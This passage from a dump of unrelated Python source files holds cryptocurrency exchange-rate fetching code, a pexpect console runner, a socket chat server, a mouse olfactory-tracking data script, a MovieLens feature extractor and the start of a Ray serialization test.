json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['NEG']['last'])}
def history_ccys(self):
return ['BRL']
class Unocoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.unocoin.com', 'trade?buy')
return {'INR': Decimal(json)}
class WEX(ExchangeBase):
def get_rates(self, ccy):
json_eur = self.get_json('wex.nz', '/api/3/ticker/btc_eur')
json_rub = self.get_json('wex.nz', '/api/3/ticker/btc_rur')
json_usd = self.get_json('wex.nz', '/api/3/ticker/btc_usd')
return {'EUR': Decimal(json_eur['btc_eur']['last']),
'RUB': Decimal(json_rub['btc_rur']['last']),
'USD': Decimal(json_usd['btc_usd']['last'])}
class Winkdex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('winkdex.com', '/api/v0/price')
return {'USD': Decimal(json['price'] / 100.0)}
def history_ccys(self):
return ['USD']
def request_history(self, ccy):
json = self.get_json('winkdex.com',
"/api/v0/series?start_time=1342915200")
history = json['series'][0]['results']
return dict([(h['timestamp'][:10], h['price'] / 100.0)
for h in history])
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
with open(path, 'r') as f:
return json.loads(f.read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print(name, "ok")
except:
print(name, "error")
continue
with open(path, 'w') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
if not os.path.exists(self.cache_dir):
os.mkdir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_history_capital_gains_config(self):
return bool(self.config.get('history_rates_capital_gains', False))
def set_history_capital_gains_config(self, b):
self.config.set_key('history_rates_capital_gains', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", "EUR")
def config_exchange(self):
return self.config.get('use_exchange', 'BitcoinAverage')
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, BitcoinAverage)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
self.exchange.read_historical_rates(self.ccy, self.cache_dir)
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate is None:
return Decimal('NaN')
return Decimal(rate)
def format_amount(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s" % self.value_str(btc_balance, rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate.is_nan() else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def fiat_value(self, satoshis, rate):
return Decimal('NaN') if satoshis is None else Decimal(satoshis) / COIN * Decimal(rate)
def value_str(self, satoshis, rate):
return self.format_fiat(self.fiat_value(satoshis, rate))
def format_fiat(self, value):
if value.is_nan():
return _("No data")
return "%s" % (self.ccy_amount_str(value, True))
def history_rate(self, d_t):
if d_t is None:
return Decimal('NaN')
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate == 'NaN' and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy, 'NaN')
self.history_used_spot = True
return Decimal(rate)
def historical_value_str(self, satoshis, d_t):
return self.format_fiat(self.historical_value(satoshis, d_t))
def historical_value(self, satoshis, d_t):
return self.fiat_value(satoshis, self.history_rate(d_t))
def timestamp_rate(self, timestamp):
from electrum.util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
|
pexpect_runner.py
|
#!/usr/bin/env python3
import sys
import pexpect
import os
import threading
import signal
import time
import Queue
import wx
import PexpectRunnerConsolImpl
def sighandler(signum, frame):
# print "Signaled: %d" %signum
if signum == signal.SIGCHLD:
sys.exit(1)
else:
text_queue.put("SIGQUIT")
def process_poller():
# command to run is arguments 2->end
global exitThread
command = " ".join(sys.argv[3:])
print("Running command %s" % command)
child = pexpect.spawn(command)
logfd = open(sys.argv[1], "w")
child.logfile = logfd
logfd.write('%s: Running command "%s"\n' % (sys.argv[0], command))
time.sleep(2)
while True:
try:
child.expect("\r\n", timeout=1)
if exitThread:
child.kill(signal.SIGINT)
child.wait()
break
if len(child.before):
text_queue.put(child.before)
except pexpect.EOF:
text_queue.put("**EXIT**")
break
except pexpect.TIMEOUT:
if exitThread:
child.kill(signal.SIGINT)
child.wait()
break
if len(child.before):
text_queue.put(child.before)
def poll_text():
# check queue
try:
while True:
msg = text_queue.get(block=False)
if msg == "SIGQUIT":
consol.Close()
return
else:
consol.TextCtrlConsol.AppendText(msg + "\n\n")
text_queue.task_done()
except Queue.Empty:
pass
# reschedule
wx.CallLater(100, poll_text)
def main(argv=None):
# argument list
# 0 = binary (pexpect_runner.py)
# 1 = log file
# 2 = title for window
# 3... = binary to run
app = wx.App(False)
global consol
consol = PexpectRunnerConsolImpl.PexpectRunnerImpl(None)
consol.SetTitle(sys.argv[2])
consol.Show(True)
global exitThread
exitThread = False
global text_queue
text_queue = Queue.Queue()
poller_thread = threading.Thread(target=process_poller)
poller_thread.start()
# register signal handler
signal.signal(signal.SIGINT, sighandler)
signal.signal(signal.SIGTERM, sighandler)
signal.signal(signal.SIGCHLD, sighandler)
wx.CallLater(1L, poll_text)
app.MainLoop()
exitThread = True
# start poller thread
poller_thread.join()
if __name__ == "__main__":
sys.exit(main())
|
servidorPYCHAT.py
|
import socket
import threading
import sys
import pickle
class Servidor():
"""docstring for Servidor"""
def __init__(self, host="localhost", port=4000):
self.clientes = []
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind((str(host), int(port)))
self.sock.listen(10)
self.sock.setblocking(False)
aceptar = threading.Thread(target=self.aceptarCon)
procesar = threading.Thread(target=self.procesarCon)
aceptar.daemon = True
aceptar.start()
procesar.daemon = True
procesar.start()
print("chequeo completo \n sistema OK....")
while True:
msg = input('->')
if msg == 'salir':
self.sock.close()
sys.exit()
else:
pass
def msg_to_all(self, msg, cliente):
for c in self.clientes:
try:
if c != cliente:
c.send(msg)
except:
self.clientes.remove(c)
def aceptarCon(self):
print("aceptarCon iniciado")
while True:
try:
conn, addr = self.sock.accept()
conn.setblocking(False)
self.clientes.append(conn)
except:
pass
def procesarCon(self):
print("ProcesarCon iniciado")
while True:
if len(self.clientes) > 0:
for c in self.clientes:
try:
data = c.recv(1024)
if data:
self.msg_to_all(data,c)
except:
pass
s = Servidor()
|
fmos_spontaneous.py
|
'''
FMOS Spontaneous - Freely Moving Olfactory Search - RECORDS SPONTANEOUS BEHAVIOR
Written: Teresa Findley, tfindley@uoregon.edu
Last Updated: 04.26.2021
--Records tracking data via OSC communication with custom code in Bonsai (open source computer vision software -- https://bonsai-rx.org/)
--Records signal data through NI USB-6009 data acquisition board
--Controls solenoid and beambreak hardware through Arduino Mega2560 & Teensyduino 2.0
'''
# [SET UP] #
##IMPORTS
##libraries
import numpy as np, cv2, os
import time, math, random, datetime
from timeit import default_timer as timer
import OSC, threading, Queue
import nidaqmx, ctypes
import matplotlib.pyplot as plt
from nidaqmx.constants import AcquisitionType, Edge
from nidaqmx.stream_readers import AnalogMultiChannelReader
##local modules
from fmos_preferences_bonsai import *
import fmos_datamgt, fmos_tracking, fmos_serial
##INITIATE VARIABLES -- these are all state machine variables to be used throughout the session
session_num = 1;
datapath,session_num = fmos_datamgt.CHK_directory(mouse_id,group_name,session_num) #update/create datapath
trialsummary_file = datapath + 'trialsummary.txt'; video_file = datapath + 'videolocation.txt'
notes_file = datapath + 'notes.txt'
ch0_file = datapath + ch0 + '.dat'; ch1_file = datapath + ch1 + '.dat' #NI signal files
ch2_file = datapath + ch2 + '.dat'; ch3_file = datapath + ch3 + '.dat'
nx_file = datapath + 'nosex.dat'; ny_file = datapath + 'nosey.dat' #bonsai tracking files
hx_file = datapath + 'headx.dat'; hy_file = datapath + 'heady.dat'
cx_file = datapath + 'comx.dat'; cy_file = datapath + 'comy.dat'
ts_file = datapath + 'timestamp.dat'
receive_address = ('localhost', 6666); trackingcoords = OSC.OSCServer(receive_address); #bonsai tracking variables
qnosex = Queue.LifoQueue(0); qnosey = Queue.LifoQueue(0); #online position storage
nosex = np.zeros((1,1)); nosey = np.zeros((1,1));
headx = np.zeros((1,1)); heady = np.zeros((1,1))
comx = np.zeros((1,1)); comy = np.zeros((1,1))
ts = np.zeros((1,1));
signaldata = np.zeros((channel_num,buffersize),dtype=np.float64) #NI data collection reading variables
reader = AnalogMultiChannelReader(ni_data.in_stream)
#Session Summary
#Create/Open Data Files
ch0_handle = open(ch0_file,'ab'); ch1_handle = open(ch1_file,'ab'); ch2_handle = open(ch2_file,'ab'); ch3_handle = open(ch3_file,'ab');
nx_handle = open(nx_file,'ab'); ny_handle = open(ny_file,'ab'); hx_handle = open(hx_file,'ab') #nx nose coord, h head coord, c center of mass
hy_handle = open(hy_file,'ab'); cx_handle = open(cx_file,'ab'); cy_handle = open(cy_file,'ab')
ts_handle = open(ts_file,'ab') #time stamp
#Bonsai Start Up
trackingcoords.addDefaultHandlers() #add default handlers to the server
def msg_handler(addr, tags, coords, source):
qnosex.put(coords[0]); qnosey.put(coords[1]); #online storage of nose position
nosex[0,0] = coords[0]; nosey[0,0] = coords[1]
headx[0,0] = coords[2]; heady[0,0] = coords[3]
comx[0,0] = coords[4]; comy[0,0] = coords[5]
ts[0,0] = timer()-session_start;
nosex.tofile(nx_handle); nosey.tofile(ny_handle)
headx.tofile(hx_handle); heady.tofile(hy_handle)
comx.tofile(cx_handle); comy.tofile(cy_handle)
ts.tofile(ts_handle)
trackingcoords.addMsgHandler("/2python",msg_handler) #add msg handler function to server
bonsaitracking = threading.Thread( target = trackingcoords.serve_forever ) #put server in parallel thread
bonsaitracking.daemon = True
#NI Set Up
ni_data.ai_channels.add_ai_voltage_chan(channels) #add channels to server
ni_data.timing.cfg_samp_clk_timing(samplingrate, '',Edge.RISING,AcquisitionType.CONTINUOUS,uInt64(buffersize)) #instruct how to sample
def ni_handler(): #define background function to handle incoming NI data
while True:
reader.read_many_sample(signaldata,number_of_samples_per_channel= buffersize, timeout=10.0)
signaldata[0,:].tofile(ch0_handle); signaldata[1,:].tofile(ch1_handle);
signaldata[2,:].tofile(ch2_handle); signaldata[3,:].tofile(ch3_handle);
nisignal = threading.Thread(target = ni_handler) #set handler function in background
nisignal.daemon = True
##INITIATE SESSION
print "Subject " + str(mouse_id) + ", Session " + str(session_num) #report session initiation
print "System Ready. Initiating Data Collection..."
bonsaitracking.start();
nose = [qnosex.get(),qnosey.get()];
session_start = timer() #session timer
ni_data.start(); nisignal.start(); #start data collection
localtime = datetime.datetime.now(); #stamp for video locator
print "Session Started."
# [MAIN CODE] #
while True:
# [State *](occurs in all states)
#Nosepoke & Timer
if timer() - session_start >= session_length:
break
if show_active_stats == True: #real time trial statistics -- not necessary for spontaneous behavior, but still available for early session termination
frame = cv2.imread('D:/FMON_Project/data/statsbackground.jpeg')
height, width, depth = frame.shape #white background
cv2.imshow('Select this window to manually end session',frame)
##Manual Session Termination
if cv2.waitKey(1) & 0xFF == ord('q'):
reasonforend = "Manual Exit"
break
# [SHUT DOWN] #
print "Session Ended." #report end of session
notepad = str(input("Please record notes here. Be precise and thorough. Write inside quotation marks with no space at the end.")) + '\n'
ch0_handle.close();ch1_handle.close();ch2_handle.close();ch3_handle.close();
nx_handle.close();ny_handle.close();hx_handle.close();hy_handle.close();cx_handle.close();cy_handle.close(); ts_handle.close()
print "Data Collection Ended" #report end of data collection
performance_report = '0'
fmos_datamgt.write_vidlocator(video_file,localtime)
fmos_datamgt.record_notes(notes_file,session_num,localtime,notepad, performance_report)
|
movielens.py
|
import logging
import random
import threading
from datetime import datetime
import numpy as np
from scipy import sparse
from sklearn.preprocessing import MinMaxScaler
from .utils import Indexer, create_sparse, timestamp_delta_generator
rating_threshold = 4
actor_threshold = 3
def generate_indexer(user_rates_movies_ds, user_tags_movies_ds, movie_actor_ds,
movie_director_ds, movie_genre_ds, movie_countries_ds, feature_begin, feature_end):
logging.info('generating indexer ...')
min_time = 1e30
max_time = -1
indexer = Indexer(['user', 'tag', 'movie', 'actor', 'director', 'genre', 'country'])
for line in user_rates_movies_ds[1:]:
line_items = line.split('\t')
rating_timestamp = float(line_items[3]) / 1000
min_time = min(min_time, rating_timestamp)
max_time = max(max_time, rating_timestamp)
rating = float(line_items[2])
if feature_begin < rating_timestamp <= feature_end and rating > rating_threshold:
indexer.index('user', line_items[0])
indexer.index('movie', line_items[1])
for line in user_tags_movies_ds[1:]:
line_items = line.split('\t')
tag_timestamp = float(line_items[3]) / 1000
if feature_begin < tag_timestamp <= feature_end:
indexer.index('user', line_items[0])
indexer.index('movie', line_items[1])
indexer.index('tag', line_items[2])
for line in movie_actor_ds[1:]:
line_items = line.split('\t')
ranking = int(line_items[3])
if ranking < actor_threshold and line_items[0] in indexer.mapping['movie']:
indexer.index('actor', line_items[1])
for line in movie_director_ds[1:]:
line_items = line.split('\t')
if line_items[0] in indexer.mapping['movie']:
indexer.index('director', line_items[1])
for line in movie_genre_ds[1:]:
line_items = line.split('\t')
if line_items[0] in indexer.mapping['movie']:
indexer.index('genre', line_items[1])
for line in movie_countries_ds[1:]:
line_items = line.split('\t')
if line_items[0] in indexer.mapping['movie']:
indexer.index('country', line_items[1])
with open('data/movielens/metadata.txt', 'w') as output:
output.write('Nodes:\n')
output.write('-----------------------------\n')
output.write('#Users: %d\n' % indexer.indices['user'])
output.write('#Tags: %d\n' % indexer.indices['tag'])
output.write('#Movies: %d\n' % indexer.indices['movie'])
output.write('#Actors: %d\n' % indexer.indices['actor'])
output.write('#Director: %d\n' % indexer.indices['director'])
output.write('#Genre: %d\n' % indexer.indices['genre'])
output.write('#Countriy: %d\n' % indexer.indices['country'])
output.write('\nEdges:\n')
output.write('-----------------------------\n')
output.write('#Rate: %d\n' % len(user_rates_movies_ds))
output.write('#Attach: %d\n' % len(user_tags_movies_ds))
output.write('#Played_by: %d\n' % len(movie_actor_ds))
output.write('#Directed_by : %d\n' % len(movie_director_ds))
output.write('#Has: %d\n' % len(movie_genre_ds))
output.write('#Produced_in: %d\n' % len(movie_countries_ds))
output.write('\nTime Span:\n')
output.write('-----------------------------\n')
output.write('From: %s\n' % datetime.fromtimestamp(min_time))
output.write('To: %s\n' % datetime.fromtimestamp(max_time))
return indexer
def parse_dataset(user_rates_movies_ds,
user_tags_movies_ds, movie_actor_ds, movie_director_ds, movie_genre_ds,
movie_countries_ds, feature_begin, feature_end, indexer):
logging.info('parsing dataset ...')
rate = []
attach = []
played_by = []
directed_by = []
has = []
produced_in = []
# while parsing the users dataset we extract the contact relationships
# occurring between users in the feature extraction window
for line in user_rates_movies_ds[1:]: # skipping the first line (header) of the dataset
line_items = line.split('\t')
# the timestamp int he dataset is represented with miliseconds, so
# we eliminate the last 3 charactars
rating = float(line_items[2])
rating_timestamp = float(line_items[3]) / 1000
if feature_begin < rating_timestamp <= feature_end and rating > rating_threshold:
user = indexer.get_index('user', line_items[0])
movie = indexer.get_index('movie', line_items[1])
rate.append((user, movie))
# while parsing the user_tag_bookmark dataset we extract the relationships
# occurring between these entities in the feature extraction window
for line in user_tags_movies_ds[1:]:
line_items = line.split('\t')
assign_time = float(line_items[3]) / 1000
if feature_begin < assign_time <= feature_end:
movie = indexer.get_index('movie', line_items[1])
tag = indexer.get_index('tag', line_items[2])
attach.append((tag, movie))
for line in movie_actor_ds[1:]:
line_items = line.split('\t')
ranking = int(line_items[3])
if ranking < actor_threshold:
movie = indexer.get_index('movie', line_items[0])
actor = indexer.get_index('actor', line_items[1])
if not (movie is None or actor is None):
played_by.append((movie, actor))
for line in movie_director_ds[1:]:
line_items = line.split('\t')
movie = indexer.get_index('movie', line_items[0])
director = indexer.get_index('director', line_items[1])
if not (movie is None or director is None):
directed_by.append((movie, director))
for line in movie_genre_ds[1:]:
line_items = line.split('\t')
movie = indexer.get_index('movie', line_items[0])
genre = indexer.get_index('genre', line_items[1])
if not (movie is None or genre is None):
has.append((movie, genre))
for line in movie_countries_ds[1:]:
line_items = line.split('\t')
movie = indexer.get_index('movie', line_items[0])
country = indexer.get_index('country', line_items[1])
if not (movie is None or country is None):
produced_in.append((movie, country))
num_usr = indexer.indices['user']
num_tag = indexer.indices['tag']
num_movie = indexer.indices['movie']
num_actor = indexer.indices['actor']
num_directors = indexer.indices['director']
num_genre = indexer.indices['genre']
num_countries = indexer.indices['country']
rate_sparse = create_sparse(rate, num_usr, num_movie)
attach_sparse = create_sparse(attach, num_tag, num_movie)
played_by_sparse = create_sparse(played_by, num_movie, num_actor)
directed_by_sparse = create_sparse(directed_by, num_movie, num_directors)
has_genre_sparse = create_sparse(has, num_movie, num_genre)
produced_in_sparse = create_sparse(produced_in, num_movie, num_countries)
return rate_sparse, attach_sparse, played_by_sparse, directed_by_sparse, has_genre_sparse, produced_in_sparse
def sample_generator(usr_rates_movies_ds, observation_begin, observation_end, rate_sparse, indexer, censoring_ratio):
logging.info('generating samples ...')
U_M = rate_sparse
observed_samples = {}
for line in usr_rates_movies_ds[1:]:
line_items = line.split('\t')
rating = float(line_items[2])
rating_timestamp = float(line_items[3]) / 1000
if observation_begin < rating_timestamp <= observation_end and rating > rating_threshold:
u = indexer.get_index('user', line_items[0])
v = indexer.get_index('movie', line_items[1])
if not (u is None or v is None):
observed_samples[u, v] = rating_timestamp - observation_begin
nonzero = sparse.find(U_M)
set_observed = set([(u, v) for (u, v) in observed_samples] + [(u, v) for (u, v) in zip(nonzero[0], nonzero[1])])
censored_samples = {}
M = len(observed_samples) // ((1 / censoring_ratio) - 1)
user_list = [i for i in range(U_M.shape[0])]
movie_list = [i for i in range(U_M.shape[1])]
while len(censored_samples) < M:
i = random.randint(0, len(user_list) - 1)
j = random.randint(0, len(movie_list) - 1)
if i != j:
u = user_list[i]
v = movie_list[j]
if (u, v) not in set_observed:
censored_samples[u, v] = observation_end - observation_begin + 1
return observed_samples, censored_samples
def extract_features(rate_sparse, attach_sparse, played_by_sparse, directed_by_sparse,
has_genre_sparse, produced_in_sparse, observed_samples, censored_samples):
logging.info('extracting ...')
num_metapaths = 11
MP = [None for _ in range(num_metapaths)]
events = [threading.Event() for _ in range(num_metapaths)]
MUM_sparse = rate_sparse.T.dot(rate_sparse)
def worker(i):
if i == 0:
MP[i] = rate_sparse.dot(played_by_sparse.dot(played_by_sparse.T))
logging.debug('0: U-M-A-M')
elif i == 1:
MP[i] = rate_sparse.dot(directed_by_sparse.dot(directed_by_sparse.T))
logging.debug('1: U-M-D-M')
elif i == 2:
MP[i] = rate_sparse.dot(has_genre_sparse.dot(has_genre_sparse.T))
logging.debug('2: U-M-G-M')
elif i == 3:
MP[i] = rate_sparse.dot(attach_sparse.T.dot(attach_sparse))
logging.debug('3: U-M-T-M')
elif i == 4:
MP[i] = rate_sparse.dot(produced_in_sparse.dot(produced_in_sparse.T))
logging.debug('4: U-M-C-M')
elif i == 5:
MP[i] = rate_sparse.dot(MUM_sparse)
logging.debug('5: U-M-U-M')
elif i == 6:
events[0].wait()
MP[i] = MP[0].dot(MUM_sparse)
logging.debug('6: U-M-A-M-U-M')
elif i == 7:
events[1].wait()
MP[i] = MP[1].dot(MUM_sparse)
logging.debug('7: U-M-D-M-U-M')
elif i == 8:
events[2].wait()
MP[i] = MP[2].dot(MUM_sparse)
logging.debug('8: U-M-G-M-U-M')
elif i == 9:
events[3].wait()
MP[i] = MP[3].dot(MUM_sparse)
logging.debug('10: U-M-T-M-U-M')
elif i == 10:
events[4].wait()
MP[i] = MP[4].dot(MUM_sparse)
logging.debug('9: U-M-C-M-U-M')
events[i].set()
threads = [threading.Thread(target=worker, args=(i,)) for i in range(num_metapaths)]
for t in threads:
t.start()
for t in threads:
t.join()
def get_features(p, q):
return [MP[i][p, q] for i in range(num_metapaths)]
X = []
Y = []
T = []
for (u, v) in observed_samples:
t = observed_samples[u, v]
fv = get_features(u, v)
X.append(fv)
Y.append(True)
T.append(t)
for (u, v) in censored_samples:
t = censored_samples[u, v]
fv = get_features(u, v)
X.append(fv)
Y.append(False)
T.append(t)
return np.array(X), np.array(Y), np.array(T)
def run(delta, observation_window, n_snapshots, censoring_ratio=0.5, single_snapshot=False):
logging.basicConfig(level=logging.INFO, format='%(asctime)s: %(message)s', datefmt='%H:%M:%S')
with open('data/movielens/user_ratedmovies-timestamps.dat') as user_rates_movies_ds:
user_rates_movies_ds = user_rates_movies_ds.read().splitlines()
with open('data/movielens/user_taggedmovies-timestamps.dat') as user_tags_movies_ds:
user_tags_movies_ds = user_tags_movies_ds.read().splitlines()
with open('data/movielens/movie_actors.dat', encoding='latin-1') as movie_actor_ds:
movie_actor_ds = movie_actor_ds.read().splitlines()
with open('data/movielens/movie_directors.dat', encoding='latin-1') as movie_director_ds:
movie_director_ds = movie_director_ds.read().splitlines()
with open('data/movielens/movie_genres.dat') as movie_genre_ds:
movie_genre_ds = movie_genre_ds.read().splitlines()
with open('data/movielens/movie_countries.dat') as movie_countries_ds:
movie_countries_ds = movie_countries_ds.read().splitlines()
delta = timestamp_delta_generator(months=delta)
observation_end = datetime(2009, 1, 1).timestamp()
observation_begin = observation_end - timestamp_delta_generator(months=observation_window)
feature_end = observation_begin
feature_begin = feature_end - n_snapshots * delta
indexer = generate_indexer(user_rates_movies_ds, user_tags_movies_ds, movie_actor_ds,
movie_director_ds, movie_genre_ds, movie_countries_ds, feature_begin, feature_end)
rate_sparse, attach_sparse, played_by_sparse, directed_by_sparse, has_genre_sparse, produced_in_sparse = parse_dataset(
user_rates_movies_ds,
user_tags_movies_ds, movie_actor_ds, movie_director_ds,
movie_genre_ds,
movie_countries_ds, feature_begin, feature_end, indexer
)
observed_samples, censored_samples = sample_generator(user_rates_movies_ds, observation_begin,
observation_end, rate_sparse, indexer, censoring_ratio)
X, Y, T = extract_features(rate_sparse, attach_sparse, played_by_sparse, directed_by_sparse,
has_genre_sparse, produced_in_sparse, observed_samples, censored_samples)
X_list = [X]
if not single_snapshot:
for t in range(int(feature_end - delta), int(feature_begin), -int(delta)):
rate_sparse, attach_sparse, played_by_sparse, directed_by_sparse, has_genre_sparse, produced_in_sparse = parse_dataset(
user_rates_movies_ds,
user_tags_movies_ds, movie_actor_ds, movie_director_ds,
movie_genre_ds,
movie_countries_ds, feature_begin, t, indexer
)
X, _, _ = extract_features(rate_sparse, attach_sparse, played_by_sparse, directed_by_sparse,
has_genre_sparse, produced_in_sparse, observed_samples, censored_samples)
X_list = [X] + X_list
for i in range(1, len(X_list)):
X_list[i] -= X_list[i - 1]
scaler = MinMaxScaler(copy=False)
for X in X_list:
scaler.fit_transform(X)
X = np.stack(X_list, axis=1) # X.shape = (n_samples, timesteps, n_features)
T /= delta
return X, Y, T
|
test_basic.py
|
# coding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from concurrent.futures import ThreadPoolExecutor
import json
import logging
import os
import random
import re
import setproctitle
import shutil
import six
import socket
import string
import subprocess
import sys
import tempfile
import threading
import time
import numpy as np
import pickle
import pytest
import ray
import ray.tests.cluster_utils
import ray.tests.utils
from ray.utils import _random_string
logger = logging.getLogger(__name__)
@pytest.fixture
def ray_start():
# Start the Ray processes.
ray.init(num_cpus=1)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.fixture
def shutdown_only():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
def test_simple_serialization(ray_start):
primitive_objects = [
# Various primitive types.
0,
0.0,
0.9,
1 << 62,
1 << 999,
"a",
string.printable,
"\u262F",
u"hello world",
u"\xff\xfe\x9c\x001\x000\x00",
None,
True,
False,
[],
(),
{},
type,
int,
set(),
# Collections types.
collections.Counter([np.random.randint(0, 10) for _ in range(100)]),
collections.OrderedDict([("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: 0, [("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: [], [("hello", 1), ("world", 2)]),
collections.deque([1, 2, 3, "a", "b", "c", 3.5]),
# Numpy dtypes.
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
]
if sys.version_info < (3, 0):
primitive_objects.append(long(0)) # noqa: E501,F821
composite_objects = (
[[obj]
for obj in primitive_objects] + [(obj, )
for obj in primitive_objects] + [{
(): obj
} for obj in primitive_objects])
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in primitive_objects + composite_objects:
new_obj_1 = ray.get(f.remote(obj))
new_obj_2 = ray.get(ray.put(obj))
assert obj == new_obj_1
assert obj == new_obj_2
# TODO(rkn): The numpy dtypes currently come back as regular integers
# or floats.
if type(obj).__module__ != "numpy":
assert type(obj) == type(new_obj_1)
assert type(obj) == type(new_obj_2)
def test_complex_serialization(ray_start):
def assert_equal(obj1, obj2):
module_numpy = (type(obj1).__module__ == np.__name__
or type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ())
or (hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently
# np.testing.assert_equal fails because we do not properly
# handle different numerical types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) == set(
list(obj2.__dict__.keys()) + special_keys)), (
"Objects {} and {} are different.".format(obj1, obj2))
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples "
"with different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (ray.serialization.is_named_tuple(type(obj1))
or ray.serialization.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), (
"Objects {} and {} are named "
"tuples with different lengths.".format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, "Objects {} and {} are different.".format(
obj1, obj2)
if sys.version_info >= (3, 0):
long_extras = [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
long_extras = [
long(0), # noqa: E501,F821
np.array([
["hi", u"hi"],
[1.3, long(1)] # noqa: E501,F821
])
]
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 100, 1 << 999, [1 << 100, [1 << 100]], "a",
string.printable, "\u262F", u"hello world",
u"\xff\xfe\x9c\x001\x000\x00", None, True, False, [], (), {},
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
